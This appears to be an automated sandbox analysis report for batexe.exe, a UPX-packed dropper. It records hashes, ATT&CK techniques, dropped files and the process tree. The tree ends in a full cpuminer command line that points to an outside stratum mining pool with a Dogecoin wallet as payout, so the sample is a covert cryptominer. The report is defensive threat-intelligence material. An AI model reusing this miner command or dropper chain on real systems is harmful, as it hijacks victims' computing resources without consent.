73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
292s
max time network
305s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
17/02/2024, 05:49

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
4892	b2e.exe
5424	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
5424	cpuminer-sse2.exe
5424	cpuminer-sse2.exe
5424	cpuminer-sse2.exe
5424	cpuminer-sse2.exe
5424	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/5472-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 5472 wrote to memory of 4892	5472	batexe.exe	85
PID 5472 wrote to memory of 4892	5472	batexe.exe	85
PID 5472 wrote to memory of 4892	5472	batexe.exe	85
PID 4892 wrote to memory of 4020	4892	b2e.exe	86
PID 4892 wrote to memory of 4020	4892	b2e.exe	86
PID 4892 wrote to memory of 4020	4892	b2e.exe	86
PID 4020 wrote to memory of 5424	4020	cmd.exe	89
PID 4020 wrote to memory of 5424	4020	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5472
- C:\Users\Admin\AppData\Local\Temp\3544.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\3544.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\3544.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4892
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4011.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4020
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:5424

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\3544.tmp\b2e.exe

Filesize
10.7MB

MD5
d252ba1897db96088c2f0a4681356a66

SHA1
5f0618d9cd3be576c8715eee36ec95de4e5a9081

SHA256
cfa246074175d1d3a932b42ff83aff67156bf650e303b9f570138d5974279530

SHA512
0cc492522b2665d8b3b69bf36c9b3732325fbf78f0865dc26cd18ad6223400b6f98f5adaa54c3f63c6c0a0397d5826474bacc0e1eae1689d0e23e3ff6f253dd3

Download Submit
C:\Users\Admin\AppData\Local\Temp\3544.tmp\b2e.exe

Filesize
3.2MB

MD5
74bea0a745285b0b2497ec24ac479b84

SHA1
7de486e811257e421506664304ca8456331cea2c

SHA256
b1bf82d4bda2785d81bcca781f567fc6398089958c735cc670962a4be876110b

SHA512
3b4e8a4ca4bf9de0fff8a018943fc146298b65173b4e4b18946ae93a85e2126edf671ae7bac5776450fc38489334b455047960cc4880d762ec08c0090ca5ece3

Download Submit
C:\Users\Admin\AppData\Local\Temp\3544.tmp\b2e.exe

Filesize
1.7MB

MD5
e505731b3ff69889b3a1999e27c9ad63

SHA1
5fe7aafdc494d2e7062bb7ec96eb95ff696e9b85

SHA256
65b67a9d4234ad209621bdc9b050a511d9a212a373d9493051e51dc038a72ada

SHA512
5416f46ac2c3edd4d27df6b258476b32d4e535ceab2bc880d8cf0a5684309f8a315bce3c9fc15b114fea075208b96f726031b0d239d4d47083f40549e062e6cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\4011.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
940KB

MD5
83a3253f78f45004ab7651f78fcad35d

SHA1
3f55305c9d43b106fa439af99f2fd45bad7ec797

SHA256
0bdbe8a865cca129a5cd6de440adf47dfd6f1b9c4a1c43c072d99849c871f494

SHA512
64c274c00e55244eacc6cfd90d8d9b318181e49f63c05db193482a2b17dc1938b36912901df09508073bb72ae6caf743307c5b4402a2274059313e033b5aa954

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
749KB

MD5
ac72fbab2f106db61a6216efb4186928

SHA1
9b56639bfe3a0e7c2e91bfbcbf27a2a677d391ca

SHA256
1bb6d52f663f7b0ea0c2641b2c16aeb4eb00f13b9b167c219fc2489ff98f0505

SHA512
f0f675be95fcbf116a4742ccb1d60995f54a3e68d5eed55d85401a222ea016551f2a87e829f72a498eac9b84aeed7ec98ff150c92aa2143307b3ef9eeb1c6405

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
514KB

MD5
8a65a108d0a0c78c1b01d455f39dbe12

SHA1
cf6941a804d6bb0e3433468d0c4f3844b8bf3d1f

SHA256
d00c257688931b73579f5971d248fd182d0f1b6d93c5e67aa147341932b538c7

SHA512
b24b5756db0d69ea141f5e6e8d0e40f5cc55a196e9fe7e2cfa13ad12162c61fa97f31a1f22f7659a25c1dbdd1deb731417dd81474b19723728ef22a6aabcb344

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
516KB

MD5
36f1871c0cbc17f145abcb79871a6f8f

SHA1
cbdb17ea66918c87ebf9732c95b02536b18a825e

SHA256
6722a009cf33974a36008d1469d502091ad06a3d06ea89b7e3165657af7dfe1b

SHA512
d9eb4b33d63d7260d6cfc13d43637cc70aa781ed33b45ce5cc72d9907b6ff9a90ecd10dac052e71bba6379544ef3bb1d516be8916d8e9a1c877b9bf5aab1c32d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
602KB

MD5
d34caf649690944718ea021fd22f457b

SHA1
74f45a30a93116f5071db53cefb654ebc11d3b1d

SHA256
fcef6065648deaed448256d62a1fe4a50b93a29dac7f5cc3a38f1de1a7d949a1

SHA512
488c847b32fdeb092731ac611c4295d5a14496ba13885030cc28e18f010ffe9cff95a0ec8a81c4a2812311246d3b92ece75761fa25946126bd35f4304ce7d556

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
518KB

MD5
446883dedf6596abf318ab5e3332f840

SHA1
759a68aa506a875068c33be22f134a48f52d33cd

SHA256
ee22985bb2f370e890f66421df0a784b28ee798936ffb443703c50e484c8ade0

SHA512
b68066b655655bc2cf06de8318db417733431ffaa952d9c727b4bbd1b5aed5a3ec40f3230419663ca1837390cdc866608348b8f8b7de97403672735a8dc50a24

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
947KB

MD5
a18bd73287e6a4d271ac0ac50e2486ca

SHA1
ea27531b8b92557e25a256aa1ad0c23db6ab5d24

SHA256
ff14de7299f57221749f636d6ea191d2532a0c6f72af25786465d19796110649

SHA512
6e9650497917b6b8fdd7c68aedde3c91ddbaf4983be9ed15a038d63badd9e99db3d3222278c93b41ee39eafa3256c0f4c152188b867b593070f18fe0ba74b859

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
282KB

MD5
897ce0d2625082803c5cd6c0bb2717aa

SHA1
8dd7dff12fe0fc2668c783fb78ff097db13173b9

SHA256
a59cb1ce223134bd094610a3360f5813ab64ba5d282d668d89110a51fc058d8f

SHA512
b18ded8e51ed2bd73403344655a72e1502cf4341c4bcab19f144015253d253c612428721c6fd3dc665241b47fd4f526cd82e346bbf36ee9e011a0eb9f3e9c8e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
120KB

MD5
f423ab29ff5d2755149bb740029de3ab

SHA1
b2f47218427d34bfc29eadde080ee480a08fc80f

SHA256
d9409a83581c4def0b0f8cfb204306443e874ab2da0a36be786cd441cfe0efc5

SHA512
f183a59b0b6737bfe943ec16b76284fe367a93d98ed5a30fa50cfb0c5874675cea07d43bbb2a3585b2f359b3890a4af20c0e7472c9cf5824915d9e90e9ca6e7d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
431KB

MD5
6ef9c4c3a1ccaa3b8bdbf09333556655

SHA1
0352f375a36b0a132f20e63ae73df367ced3b33b

SHA256
5bcd1153c150dc43f59ac6ceefab20c089088e18e2d370bb136b5be854b63795

SHA512
076a09ef566c8964282c644ea93cfab64c253bf4d2f27dfbb92fdb5e26b57d616ce6f41e78905706e22467286efc7df1c168ba3ae7e0f0ead55b426fd9463388

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
303KB

MD5
d552859ae171ea3c285c9924286b6134

SHA1
cfb618f4cc901de1b7fae59b85cb35798a7b68e8

SHA256
8adbd70e553f46fd8fa755384cfebf47ce280d6b1e2ad071ae39f50f84892cd7

SHA512
1de60e7f73ff8f31d5359827c234328a305e8bcfa2ce8f06cb8a4fd5ab438388992dcc7ea845b54f4bce21262a1f73e0be201bbcb1e936098afc4bc4df8e7691

Download Submit
memory/4892-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4892-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5424-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5424-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5424-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/5424-46-0x0000000065FD0000-0x0000000066068000-memory.dmp

Filesize
608KB

Download
memory/5424-47-0x0000000001060000-0x0000000002915000-memory.dmp

Filesize
24.7MB

Download
memory/5424-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5424-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5424-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/5424-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5424-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5424-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5424-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5424-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5472-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download